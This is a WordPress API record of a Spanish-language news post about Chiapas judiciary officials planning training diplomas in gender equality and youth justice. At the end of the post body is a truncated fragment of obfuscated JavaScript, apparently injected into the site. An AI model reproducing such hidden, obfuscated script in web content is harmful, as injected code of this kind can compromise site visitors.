{"id":2598,"date":"2022-06-03T19:39:48","date_gmt":"2022-06-03T19:39:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2598"},"modified":"2022-06-03T19:39:49","modified_gmt":"2022-06-03T19:39:49","slug":"continua-pje-capacitacion-en-igualdad-de-genero-y-derechos-de-la-infancia-y-adolescencia","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2598","title":{"rendered":"Contin\u00faa PJE capacitaci\u00f3n en Igualdad de G\u00e9nero y Derechos de la Infancia y Adolescencia"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-02-at-2.41.12-PM.jpeg\" alt=\"\" class=\"wp-image-2599\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-02-at-2.41.12-PM.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-02-at-2.41.12-PM-225x300.jpeg 225w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>03 de Junio del 2022. El Poder Judicial del Estado de Chiapas, bajo las instrucciones del magistrado presidente Juan \u00d3scar Trinidad Palacios, ha promovido la capacitaci\u00f3n constante para las y los servidores p\u00fablicos de \u00e1reas jurisdiccionales y administrativas, con el fin de garantizar el respeto de los derechos y garant\u00edas individuales en nuestra entidad.En esa sinergia, la consejera de la Judicatura, Isela de Jes\u00fas Mart\u00ednez Flores y el director del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, Pedro Farro \u00c1lvarez, sostuvieron una reuni\u00f3n de trabajo con el director de la Facultad de Derecho, campus III, con sede en San Crist\u00f3bal de Las Casas, Miguel \u00c1ngel de los Santos; con el objetivo de afinar los detalles de la clausura de los diplomados de Igualdad de G\u00e9nero, Derechos de Ni\u00f1as, Ni\u00f1os y Adolescentes y Justicia para Adolescentes, que iniciaron en el mes de octubre del a\u00f1o 2021.Asimismo, en esta reuni\u00f3n, detallaron y planificaron el lanzamiento de la pr\u00f3xima convocatoria correspondiente al a\u00f1o 2022, para la capacitaci\u00f3n que tiene como objetivo, dotar de conocimientos jur\u00eddicos, t\u00e9cnicos y multidisciplinarios, as\u00ed como sensibilizar a las personas juzgadoras y a todo el personal que brinda la atenci\u00f3n a las y los usuarios del servicio de impartici\u00f3n de justicia.En esta importante reuni\u00f3n estuvieron presentes tambi\u00e9n la jueza Especializada en Justicia para Adolescentes, Jaqueline \u00c1ngel Juan y la coordinadora acad\u00e9mica de los diplomados, Sara Ram\u00edrez.Con este ejercicio, se prioriza la capacitaci\u00f3n con la finalidad de que el Tribunal Superior de Justicia garantice el cumplimiento de los derechos relacionados con ni\u00f1as, ni\u00f1os y adolescentes; as\u00ed como el eje transversal con enfoque de g\u00e9nero que debe ser observado en todos los servicios de impartici\u00f3n de justicia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>03 de Junio del 2022. El Poder Judicial del Estado de Chiapas, bajo las instrucciones del magistrado presidente Juan \u00d3scar Trinidad Palacios, ha promovido la capacitaci\u00f3n constante para las y los servidores p\u00fablicos de \u00e1reas jurisdiccionales y administrativas, con el fin de garantizar el respeto de los derechos y garant\u00edas individuales en nuestra entidad.En esa &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2599,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-2598","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2598","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2598"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2598\/revisions"}],"predecessor-version":[{"id":2600,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2598\/revisions\/2600"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2599"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2598"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2598"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2598"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}